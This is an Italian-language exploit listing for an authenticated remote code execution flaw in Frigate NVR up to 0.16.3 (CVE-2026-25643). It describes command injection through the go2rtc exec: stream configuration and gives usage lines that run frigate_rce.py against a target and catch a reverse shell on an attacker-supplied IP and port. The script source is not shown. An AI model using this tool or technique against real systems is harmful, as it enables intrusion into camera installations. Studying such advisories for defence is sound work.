
Exploit per la RCE autenticata di Frigate NVR tramite go2rtc exec: iniezione di protocollo, automazione dell'esecuzione di comandi di sistema e cattura di reverse shell.
Exploit Title: Frigate NVR <= 0.16.3 - Esecuzione Remota di Codice
Autenticata
Data: 2026-02-05
Autore dell'exploit: jduardo2704
Homepage del fornitore: https://frigate.video/
Link del software: https://github.com/blakeblackshear/frigate
Versione: <= 0.16.3
CVE: CVE-2026-25643
Avviso: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Le versioni di Frigate fino alla 0.16.3 sono vulnerabili all'esecuzione remota di codice (RCE) tramite la configurazione go2rtc. Un attaccante con accesso autenticato (o non autenticato se l'istanza è esposta) può iniettare comandi di sistema nella configurazione dello stream utilizzando il protocollo exec:. Questo exploit automatizza l'iniezione del payload, riavvia il servizio e cattura la reverse shell.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati.